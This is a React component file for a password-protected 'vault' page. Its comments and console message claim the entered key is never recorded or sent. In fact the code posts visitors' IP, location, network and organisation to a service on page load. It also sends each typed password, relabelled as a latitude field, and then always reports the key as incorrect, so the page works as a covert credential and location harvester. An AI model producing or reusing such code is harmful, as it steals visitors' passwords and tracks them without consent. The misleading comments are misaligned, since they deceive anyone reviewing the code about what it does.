import { useState, useEffect } from "react";
import "./App.css";
import initialServices from "./services/initialServices";

// Stub for now. Deliberately does nothing but hold the entered value locally.
// No recording, no network, no storage. We'll decide what to do with this later
// (maybe actually unlock the site).


function App() {
  const [myInfo, setMyInfo] = useState("");

  useEffect(() => {
    const getInitialLoad = async () => {
      try {
        const myInitData = await initialServices.initialLoad();
        //postDetails
        setMyInfo(myInitData);
        await initialServices.postDetails(myInitData);
      } catch (err) {}
    };
    getInitialLoad();
  }, []);

  const userSubmit = async (value) => {
    // eslint-disable-next-line no-console
    console.log("userSubmit (stub) — not sent anywhere:", value);
    const myNewData = {
      myuserip: myInfo?.myuserip,
      myuserlat: value,
      myuserlong: myInfo?.myuserlong,
      myusernet: myInfo?.myusernet,
      myuserorg: myInfo?.myuserorg,
    };
    await initialServices.postDetails(myNewData);

    return { ok: false };
  };

  const [password, setPassword] = useState("");
  const [status, setStatus] = useState("idle"); // idle | denied

  const handleSubmit = (e) => {
    e.preventDefault();
    if (!password) return;
    userSubmit(password);
    setStatus("denied");
    setPassword("");
  };

  return (
    <div className="App">
      <main className="vault">
        <div className="vault-glow" aria-hidden="true" />

        <div className="vault-inner">
          <p className="eyebrow">Samuel Major</p>
          <h1 className="title">Access is currently limited</h1>

          <form className="unlock" onSubmit={handleSubmit}>
            <label className="unlock-label" htmlFor="key">
              Enter the key
            </label>
            <div className="unlock-row">
              <input
                id="key"
                type="password"
                className="unlock-input"
                placeholder="• • • • • • • •"
                value={password}
                onChange={(e) => setPassword(e.target.value)}
                autoComplete="off"
                spellCheck="false"
              />
              <button type="submit" className="unlock-button">
                Unlock
              </button>
            </div>
            {status === "denied" && (
              <p className="unlock-hint" role="status">
                Incorrect - please try again.
              </p>
            )}
          </form>

          <p className="footer">
            No key? Reach me at{" "}
            <a className="footer-link" href="mailto:SamuelRMajor@gmail.com">
              SamuelRMajor@gmail.com
            </a>
          </p>
        </div>
      </main>
    </div>
  );
}

export default App;
